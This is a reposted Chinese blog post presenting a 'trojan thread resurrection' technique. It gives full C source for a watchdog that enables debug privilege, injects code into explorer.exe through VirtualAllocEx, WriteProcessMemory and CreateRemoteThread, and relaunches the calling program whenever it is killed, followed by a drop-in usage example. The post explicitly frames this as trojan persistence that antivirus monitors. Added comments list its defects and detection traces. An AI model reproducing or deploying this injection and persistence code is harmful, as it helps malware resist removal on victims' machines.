木马的线程复活技术
遠程線程插入技術,挺常見而實用的東西。
只是這個遠程線程插入函數被很多殺軟作為重點監視對象,所以不知道這東西以后還能用不。
/////NotDead.h
//
#include <windows.h>
#include <TLHELP32.H>

// Defined (not merely declared) in a header; nothing below reads it.
TCHAR exepath[MAX_PATH]={0x00};

// Parameter block: copied into the host process and handed to the injected thread.
// It carries resolved kernel32 export addresses because the copied code cannot use
// this module's import table once it runs inside another process.
typedef struct _remotepara {
    DWORD pWaitForSingleObject;   // address of kernel32!WaitForSingleObject, stored as a 32-bit DWORD
    DWORD pOpenProcess;           // address of kernel32!OpenProcess
    DWORD pWinExec;               // address of kernel32!WinExec
    DWORD PID;                    // PID of the process being watched (the caller of NotDead())
    HANDLE hProcess;              // written by the remote thread, never read back
    char path[MAX_PATH];          // command line relaunched once that process exits
}REMOTEPARA,*pREMOTEPARA;

// Enable the named privilege on the current process token (NotDead() passes SE_DEBUG_NAME).
// Returns false if the token cannot be opened, the name cannot be resolved, or
// AdjustTokenPrivileges fails. Note that AdjustTokenPrivileges returning TRUE does not
// prove the privilege was granted (GetLastError() == ERROR_NOT_ALL_ASSIGNED is not checked),
// and hToken is never closed.
bool EnableDebugPrivilege(const char *name)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))return false;
    if (!LookupPrivilegeValue(NULL,name,&tp.Privileges[0].Luid))return false;
    tp.PrivilegeCount=1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL))return false;
    return true;
}

// Look up a PID by executable name with a Toolhelp snapshot, comparing case-insensitively.
// Returns 0 if no process matches or the snapshot cannot be created.
// The name shadows the Win32 API of the same name (kernel32!GetProcessId).
// strlwr() lowercases both strings in place, so ProcessName is modified; NotDead()
// passes a string literal here. The snapshot handle is leaked on the early return
// inside the loop.
DWORD GetProcessId(char *ProcessName)
{
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if (hProcessSnap==INVALID_HANDLE_VALUE)return 0;
    BOOL bProcess=Process32First(hProcessSnap,&pe32);
    while(bProcess){
        if (strcmp(strlwr(pe32.szExeFile),strlwr(ProcessName))==0)return pe32.th32ProcessID;   // hProcessSnap not closed on this path
        bProcess=Process32Next(hProcessSnap,&pe32);
    }
    CloseHandle(hProcessSnap);
    return 0;
}

// Body of the thread started inside the host process. NotDead() copies 4 KB of raw
// machine code starting at this symbol into the host, so the function may not touch
// this module's globals, imports or string literals; everything it needs arrives via
// the REMOTEPARA block. It opens the watched process, blocks until that process
// terminates, then relaunches rp->path with WinExec.
DWORD WINAPI remote(LPVOID _rp)
{
    REMOTEPARA *rp = (REMOTEPARA*)_rp;
    typedef UINT (WINAPI *XWinExec)(LPSTR,UINT);
    typedef HANDLE (WINAPI *XOpenProcess)(DWORD,BOOL,DWORD);
    typedef DWORD (WINAPI *XWaitForSingleObject)(HANDLE,DWORD);
    // Rebuild callable function pointers from the addresses NotDead() resolved.
    XWaitForSingleObject MyWaitForSingleObject = (XWaitForSingleObject)rp->pWaitForSingleObject;
    XOpenProcess MyOpenProcess = (XOpenProcess)rp->pOpenProcess;
    XWinExec MyWinExec = (XWinExec)rp->pWinExec;
    // Detect termination of the watched process and restart it.
    // The handle is not validated: if OpenProcess fails, the wait returns at once
    // and WinExec runs immediately.
    rp->hProcess = MyOpenProcess(PROCESS_ALL_ACCESS,FALSE,rp->PID);
    MyWaitForSingleObject(rp->hProcess,INFINITE);
    MyWinExec(rp->path,SW_SHOW);
    return 0;
}

// Install the watchdog: inject a copy of remote() into explorer.exe so that this
// executable is relaunched when the current process exits.
// Returns 1 on success, 0 on any failure.
// Defects as written: every failure path after OpenProcess returns without closing
// hProtecte, and the thread handle from CreateRemoteThread is never closed.
// Observable host-side sequence (useful for detection): SeDebugPrivilege enabled on
// the caller's own token; explorer.exe opened with PROCESS_ALL_ACCESS; a 4 KB
// PAGE_EXECUTE_READWRITE region allocated and written; a second PAGE_READWRITE region
// written with the parameter block; CreateRemoteThread targeting the first region.
int NotDead()
{
    // Elevate: enable SeDebugPrivilege on this process token.
    if(!EnableDebugPrivilege(SE_DEBUG_NAME))return 0;
    // PIDs of the host (explorer.exe) and of the protected process (this one).
    DWORD ProctectPID,ProctectedPID;
    ProctectedPID=GetCurrentProcessId();
    if ((ProctectPID=GetProcessId("explorer.exe")) == 0)return 0;   // GetProcessId lowercases this literal in place
    // Open the host process.
    HANDLE hProtecte = OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProctectPID);
    if (hProtecte==NULL)return 0;
    // Allocate executable memory in the host for the copy of remote().
    HANDLE RemoteAddrFun;
    RemoteAddrFun = (PTSTR)VirtualAllocEx(hProtecte,NULL,1024*4,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    if (RemoteAddrFun==NULL)return 0;
    // Write remote(): copies a fixed 4 KB from the symbol, so it assumes the compiled
    // function is shorter than that, contiguous, and position-independent; whatever
    // follows it in .text is copied along.
    if (WriteProcessMemory(hProtecte,RemoteAddrFun,(LPVOID)remote,1024*4,NULL)==FALSE)return 0;
    // Build the remote thread's parameter block.
    REMOTEPARA rp;
    memset((char *)&rp,0x00,sizeof(rp));
    GetModuleFileName(NULL,rp.path,260);   // 260 == MAX_PATH, the size of rp.path
    rp.PID = ProctectedPID;
    // Resolve kernel32 exports in this process and reuse the addresses in the host:
    // valid only while kernel32 is mapped at the same base in both processes, and
    // only for 32-bit builds since the pointers are truncated to DWORD.
    HMODULE hkernel = GetModuleHandle("kernel32.dll");
    rp.pOpenProcess = (DWORD)GetProcAddress(hkernel,"OpenProcess");
    rp.pWinExec = (DWORD)GetProcAddress(hkernel,"WinExec");
    rp.pWaitForSingleObject = (DWORD)GetProcAddress(hkernel,"WaitForSingleObject");
    // Allocate memory in the host for the parameter block.
    HANDLE RemoteAddrPara;
    RemoteAddrPara = (PTSTR)VirtualAllocEx(hProtecte,NULL,sizeof(rp),MEM_COMMIT,PAGE_READWRITE);
    if (RemoteAddrPara==NULL)return 0;
    // Write the parameters.
    if (WriteProcessMemory(hProtecte,RemoteAddrPara,(LPVOID)&rp,sizeof(rp),NULL)==FALSE)return 0;
    //===================================
    // Create the remote thread
    //===================================
    HANDLE hRemoteThread = CreateRemoteThread(hProtecte,NULL,0,(LPTHREAD_START_ROUTINE)RemoteAddrFun,(LPVOID)RemoteAddrPara,0,NULL);
    if (hRemoteThread==NULL)return 0;
    CloseHandle(hProtecte);   // hRemoteThread is left open
    return 1;
}
?
使用方法:只需要在程序中調用NotDead()即可。
示例:
// X.cpp : Defines the entry point for the application. // #include "stdafx.h" #include "resource.h" #include "NotDead.h"INT CALLBACK DlgProc(HWND hwndDlg, // handle to dialog boxUINT uMsg, // messageWPARAM wParam, // first message parameterLPARAM lParam // second message parameter ) {switch(uMsg){case WM_INITDIALOG:NotDead();break;case WM_CLOSE:EndDialog(hwndDlg,0);break;}return 0; }int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) {DialogBox(hInstance,MAKEINTRESOURCE(IDD_DIALOG1),NULL,DlgProc);return 0; }?
轉載于:https://www.cnblogs.com/littleevil/archive/2012/05/21/2511278.html
總結